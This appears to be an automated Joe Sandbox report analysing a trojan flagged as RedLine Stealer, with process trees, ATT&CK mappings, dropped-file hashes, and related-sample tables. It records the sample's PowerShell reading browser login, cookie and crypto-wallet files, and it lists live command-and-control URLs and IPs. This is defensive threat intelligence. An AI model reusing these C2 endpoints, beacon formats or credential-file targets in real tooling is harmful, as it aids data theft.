Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (techniques listed per tactic; the number of matching signatures, where any matched, is given in parentheses)

Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (221); Native API (1); Command and Scripting Interpreter (12); PowerShell (1); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Privilege Escalation: DLL Side-Loading (1); Process Injection (12); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Timestomp (1); DLL Side-Loading (1); File Deletion (1); Masquerading (21); Modify Registry (1); Virtualization/Sandbox Evasion (231); Process Injection (12); Right-to-Left Override
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); Peripheral Device Discovery (11); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (128); Security Software Discovery (261); Process Discovery (1); Virtualization/Sandbox Evasion (231); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
Lateral Movement: Replication Through Removable Media (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: Archive Collected Data (1); Data from Local System (2); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1294691
Sample: SecuriteInfo.com.Win32.Troj...
Startdate: 21/08/2023
Architecture: WINDOWS
Score: 50

Signatures on the start node:
• Snort IDS alert for network traffic
• Multi AV Scanner detection for submitted file
• Yara detected RedLine Stealer
• Yara detected MalDoc

Process tree:
• msiexec.exe 3 15 (started)
  • dropped: C:\Windows\Installer\6766e2.msi (Composite); C:\Windows\Installer\MSI6D80.tmp (PE32); C:\Windows\Installer\MSI6B9A.tmp (PE32); 4 other files (none is malicious)
  • msiexec.exe 9 (started)
    • dropped: C:\Users\user\AppData\Local\...\scr6E46.ps1 (Unicode); C:\Users\user\AppData\Local\...\pss6E59.ps1 (Unicode)
    • powershell.exe 15 20 (started)
      • DNS/IP: 45.135.232.24, 49747, 9878 ASBAXETNRU Russian Federation; prkl-ads.ru 81.177.140.69, 443, 49735, 49736 RTCOMM-ASRU Russian Federation
      • signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
      • conhost.exe (started)
  • msiexec.exe (started)
    • signature: Bypasses PowerShell execution policy
• SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe 22 (started)
  • dropped: C:\Users\user\AppData\Roaming\...\Helper.msi (Composite); C:\Users\user\AppData\Local\...\shi6220.tmp (PE32+); C:\Users\user\AppData\Local\...\MSI634A.tmp (PE32)
  • msiexec.exe 2 (started)

Source | Detection | Scanner
SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe | 13% | ReversingLabs

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\MSI634A.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\shi6220.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI69F0.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6AAC.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6AFB.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6B3B.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6B9A.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSI6D80.tmp | 0% | ReversingLabs
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://ns.adobe.cobj | 0% | URL Reputation | safe
http://ocsps.ssl.com0 | 0% | URL Reputation | safe
http://ns.adobe.c/g | 0% | URL Reputation | safe
http://ns.ado/1 | 0% | URL Reputation | safe
http://html4/loose.dtd | 0% | Avira URL Cloud | safe
http://.css | 0% | Avira URL Cloud | safe
http://.jpg | 0% | Avira URL Cloud | safe
https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test | 0% | Avira URL Cloud | safe
https://prkl-ads.ru/?status=install | 0% | Avira URL Cloud | safe
http://crls.ssl.co | 0% | Avira URL Cloud | safe
https://prkl-ads.ru/?status=start&av=Windows%20Defender | 0% | Avira URL Cloud | safe
https://prkl-ads.ru/?status=start&av=$displayNamesString | 0% | Avira URL Cloud | safe
https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Test | 0% | Avira URL Cloud | safe
http://crl.m2 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
prkl-ads.ru | 81.177.140.69 | true | false | (none) | unknown

Name | Malicious | Antivirus Detection | Reputation
https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Test | false | Avira URL Cloud: safe | unknown
https://prkl-ads.ru/?status=start&av=Windows%20Defender | false | Avira URL Cloud: safe | unknown
https://prkl-ads.ru/?status=install | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://html4/loose.dtd | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr | false | Avira URL Cloud: safe | low
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | false | (none) | high
http://ns.adobe.cobj | powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cert.ssl.com/SSLcom-SubCA-RSA-Q | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://ocsps.ssl.com0 | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | false | URL Reputation: safe | unknown
http://cert.ssl.com/SSLcom-SubCA- | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://ns.adobe.c/g | powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.dr | false | Avira URL Cloud: safe | unknown
http://.css | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr | false | Avira URL Cloud: safe | low
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | false | (none) | high
https://www.thawte.com/cps0/ | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | false | (none) | high
http://crl.m2 | powershell.exe, 00000006.00000003.382384474.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.382588413.0000000007A03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1. | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://prkl-ads.ru/?status=start&av=$displayNamesString | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.dr | false | Avira URL Cloud: safe | unknown
https://www.thawte.com/repository0W | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | false | (none) | high
https://www.ssl.com/repository0 | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | false | (none) | high
https://www.advancedinstaller.com | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6AFB.tmp.1.dr, Helper.msi.0.dr, MSI6D80.tmp.1.dr, 6766e2.msi.1.dr, MSI69F0.tmp.1.dr, MSI6AAC.tmp.1.dr, MSI634A.tmp.0.dr, MSI6B3B.tmp.1.dr, MSI6B9A.tmp.1.dr | false | (none) | high
http://crls.ssl.co | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr | false | Avira URL Cloud: safe | unknown
http://.jpg | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.dr | false | Avira URL Cloud: safe | low
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0 | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.dr | false | (none) | high
http://crls.ssl.com/SSLcom-SubCA-CodeSigniP | SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://ns.ado/1 | powershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
81.177.140.69 | prkl-ads.ru | Russian Federation | 8342 | RTCOMM-ASRU | false
45.135.232.24 | unknown | Russian Federation | 49392 | ASBAXETNRU | true
                                  Joe Sandbox Version:38.0.0 Beryl
                                  Analysis ID:1294691
                                  Start date and time:2023-08-21 19:49:51 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 9m 58s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Run name:Run with higher sleep bypass
Number of new started processes analysed:18
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                  Detection:MAL
                                  Classification:mal50.troj.spyw.evad.winEXE@11/25@1/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 63%
                                  • Number of executed functions: 64
                                  • Number of non-executed functions: 157
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.209.48.97
                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, metacookie25c19ec61c.blob.core.windows.net, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, g.bing.com, cdn.onenote.net, arc.msn.com, blob.ams08prdstr10a.store.core.windows.net
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
81.177.140.69 | scrFE4.ps1 | malicious | Unknown

No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASBAXETNRU | 1UlCDhAaM1.elf | malicious | Mirai, Moobot | 212.196.204.8
ASBAXETNRU | LaCasa.vbs | malicious | Njrat | 91.213.50.74
ASBAXETNRU | Chr#U043em#U0435S#U0435tu#U0440.exe | malicious | Unknown | 194.87.31.176
ASBAXETNRU | fx_4.7.3.exe | malicious | Stealc, Vidar | 194.87.31.176
ASBAXETNRU | fx_7.4.1.exe | malicious | Stealc, Vidar | 194.87.31.176
ASBAXETNRU | A7FS7UsXiY.exe | malicious | RedLine, SectopRAT | 194.87.31.22
ASBAXETNRU | VTjAohspH6.elf | malicious | Unknown | 45.130.146.7
ASBAXETNRU | http://91.213.50.62 | malicious | Unknown | 91.213.50.62
ASBAXETNRU | http://app.adjust.com/ae38vy_kw5p6x?campaign=BILYONER_1337578_+0091218-%23%23campaign_id%3D1337578%23%23-%23%23merchant_id%3D778280%23%23&adgroup=BILYONER_1337578_+0091218&creative=BILYONER_1337578_+0091218&deep_link=hopi://campaigns/campaignId%3D1337578%26campaignType%3DPOS%26campaignTargetingType%3DPUBLIC&redirect=//is%2egd%2fvj1NpI | malicious | Unknown | 91.213.50.27
ASBAXETNRU | UIk7s3Q4Us.elf | malicious | Unknown | 212.196.189.86
ASBAXETNRU | armv5l-20230712-1356.elf | malicious | Mirai | 212.196.181.155
ASBAXETNRU | Stephan_Fruehauf_sparkasse_receipt_15.01.2023.pdf - #U526f#U672c.exe | malicious | Unknown | 45.93.201.114
ASBAXETNRU | Stephan_Fruehauf_sparkasse_receipt_15.01.2023.pdf - #U526f#U672c.exe | malicious | Unknown | 45.93.201.114
ASBAXETNRU | https://zoe.mediaworks.hu/zctc3/48/Freemail/16169015/?redirect=https%3A%2F%2Fnewazabaka.com%2F1.php%3Fpage%3D9322041helyi-kozelet%2F2023%2F07%2Fmegkezdte-mukodeset-a-bunmegelozesi-iroda-keszthelyen-es-zalakaroson%3Futm_source%3Dfreemail_line%26utm_medium%3Dreferral%26utm_campaign%3Dott_a_49 | malicious | Unknown | 91.213.50.68
ASBAXETNRU | https://naruto.su/link.ext.php?url=https%3A%2F%2Fmononoke-inu.com%2Ff%2F781393993663608775250598025566639730617831643923461959955014 | malicious | Unknown | 91.213.50.68
ASBAXETNRU | gorbra.vbs | malicious | Njrat | 91.213.50.74
ASBAXETNRU | https://gitmind.com/app/docs/mvhmzs7p | malicious | Unknown | 212.192.14.24
ASBAXETNRU | 62DLSmaM4W.elf | malicious | Mirai | 212.196.181.170
ASBAXETNRU | B3wGycYtCb.elf | malicious | Unknown | 212.196.169.42
RTCOMM-ASRU | 41O3Ng20n4.elf | malicious | Mirai | 81.177.17.84
RTCOMM-ASRU | scrFE4.ps1 | malicious | Unknown | 81.177.140.69
RTCOMM-ASRU | frank_v4.ps1 | malicious | RedLine | 81.177.140.194
RTCOMM-ASRU | rOtpAxzBT7.elf | malicious | Mirai | 213.59.13.180
RTCOMM-ASRU | sora.arm.elf | malicious | Mirai | 81.176.232.244
RTCOMM-ASRU | l2UQPm9o6q.elf | malicious | Mirai | 81.177.17.33
RTCOMM-ASRU | https://9sta9rt4.store/?status=reg&key=19.06_ow2hgf&site=Notion | malicious | Unknown | 81.177.140.194
RTCOMM-ASRU | SECT_v4.ps1 | malicious | Unknown | 195.161.114.3
RTCOMM-ASRU | dImXBB5Rd4.elf | malicious | Unknown | 213.24.4.242
RTCOMM-ASRU | 96WwSFtZrw.exe | malicious | FormBook, GuLoader | 195.161.41.198
RTCOMM-ASRU | armv5l-20230712-1356.elf | malicious | Mirai | 81.176.255.15
RTCOMM-ASRU | x86-20230712-1356.elf | malicious | Mirai | 81.176.255.40
RTCOMM-ASRU | sora.arm.elf | malicious | Mirai | 81.177.17.99
RTCOMM-ASRU | PXPz45kM78.elf | malicious | Mirai | 81.176.231.60
RTCOMM-ASRU | MoEwyGqNDT.elf | malicious | Unknown | 81.177.42.10
RTCOMM-ASRU | pformbook.exe | malicious | FormBook
                                    • 195.161.62.100
                                    y0uWRexXtw.exeGet hashmaliciousFormBook, PrivateLoaderBrowse
                                    • 195.161.62.100
                                    202385_dated_20.06.2023_-_#U0421PS_Grupp,_LLC.xlsGet hashmaliciousFormBookBrowse
                                    • 195.161.62.100
                                    SecuriteInfo.com.Gen.Variant.Nemesis.22803.4515.12611.exeGet hashmaliciousFormBookBrowse
                                    • 195.161.62.100
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    54328bd36c14bd82ddaa0c04b25ed9advn.cmdGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    yTj0n5qu.posh.ps1Get hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd.exeGet hashmaliciousLimeRATBrowse
                                    • 81.177.140.69
                                    SCV.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Photo_Image_Store-MnZ8RD7ic7oBUDadT3RD-22100-17668.batGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    ZI5Fu2nDVe.exeGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    EHJ.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    DHL_AWB_2506307661.exeGet hashmaliciousFormBookBrowse
                                    • 81.177.140.69
                                    qasx(1).vbsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    HVS.vbsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    #U0395#U03bd#U03c4#U03bf#U03bb#U03ae_#U03b1#U03b3#U03bf#U03c1#U03ac#U03c2.htaGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Notice_4331860.jsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    Notice_5595225.jsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    lnvoice_#72993_pdf.vbsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    Informe_Detallado_Reporte_Centrales_2023_08_015_PDF.vbsGet hashmaliciousNjratBrowse
                                    • 81.177.140.69
                                    Invoice_ID.lnkGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    file.jsGet hashmaliciousUnknownBrowse
                                    • 81.177.140.69
                                    decode_6fda918c8a7ba6982a7080a5eff5f97ec6ec50bea55936e98179f3683aa2c6e5.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 81.177.140.69
                                    decode_da721f195f41b72d8f2813eaa2c8388786bf5dffe6cbf59633a61a45576273f6.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 81.177.140.69
                                    3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.DropperX-gen.8729.3836.exeGet hashmaliciousLokibotBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Win32.PWSX-gen.10653.20560.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Win32.PWSX-gen.8807.11627.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    NEW_ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Payment_slip.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    080523-FM_06-01_WSF.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Trojan.PackedNET.2290.18406.25496.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    1.exeGet hashmaliciousGuLoaderBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Trojan.PWS.RedLineNET.7.19291.11472.exeGet hashmaliciousMinerDownloader, RedLine, XmrigBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Win32.PWSX-gen.508.12387.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Remesas_Aceptadas_PDF.exeGet hashmaliciousGuLoaderBrowse
                                    • 81.177.140.69
                                    RESOL20230818RAD18082023.exeGet hashmaliciousAsyncRATBrowse
                                    • 81.177.140.69
                                    INVOICE_933736.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    Diizc.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 81.177.140.69
                                    SCV.vbsGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    SecuriteInfo.com.Trojan.PackedNET.2289.22780.12057.exeGet hashmaliciousAgentTeslaBrowse
                                    • 81.177.140.69
                                    arctically_revyers.exeGet hashmaliciousGuLoaderBrowse
                                    • 81.177.140.69
                                    file.exeGet hashmaliciousRedLineBrowse
                                    • 81.177.140.69
                                    kINq4bw6GZ.exeGet hashmaliciousRedLineBrowse
                                    • 81.177.140.69
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\MSI634A.tmpNotaFiscal.msiGet hashmaliciousUnknownBrowse
                                      radarinstaller.exeGet hashmaliciousUnknownBrowse
                                        radarinstaller.exeGet hashmaliciousUnknownBrowse
                                          Danfe2372342.msiGet hashmaliciousUnknownBrowse
                                            Danfe2372342.msiGet hashmaliciousUnknownBrowse
                                              id-Processo_Z5TGVQUK.msiGet hashmaliciousUnknownBrowse
                                                id-Processo_Z5TGVQUK.msiGet hashmaliciousUnknownBrowse
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8003
                                                  Entropy (8bit):4.839308921501875
                                                  Encrypted:false
                                                  SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                  MD5:937C6E940577634844311E349BD4614D
                                                  SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                  SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                  SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):10884
                                                  Entropy (8bit):5.904802065885252
                                                  Encrypted:false
                                                  SSDEEP:192:u5L9zujlDaXp2fdwiyY/M35Gb6iSR9nGJIGtuQpHB7ocQ:u5L96jwpAbyUM3PBR9GJDu8BMcQ
                                                  MD5:8CBEDA4BBB59AC09BEFBD75C787D9C97
                                                  SHA1:BE1D4356582FFE8537067AEA11C05FC28C91BEA8
                                                  SHA-256:F0144DBFCC4168EE3BA3387DEDFDCE83B427FDDB604B35627F62873EBAD46640
                                                  SHA-512:F7673E7BECFB0F46A1B3CD8A2D0E6DE9E2A3F28A98E522929F186F2A0D5432D36BEAEE9BFDC150FA6BE1E4278AE1F784ED21CBFA2F442741E40CCF3CB8D5E4DE
                                                  Malicious:false
                                                  Preview:@...e...............&...2...............\.0.....................P................./.C..J..%...].n.....%.Microsoft.PowerShell.Commands.Utility...H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.Automation4...................v.A.Z...W.1........System.Data.4................ .v'#-N....M..d........System.Xml..<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8....................@.Z:.h...........System.Numerics.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................&M ..E..;............System.Transactions.<.................hr..B.....w.O........System.ConfigurationD.....................G..H.).7.........System.Configuration.Ins
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):570784
                                                  Entropy (8bit):6.450187144191945
                                                  Encrypted:false
                                                  SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                  MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                  SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
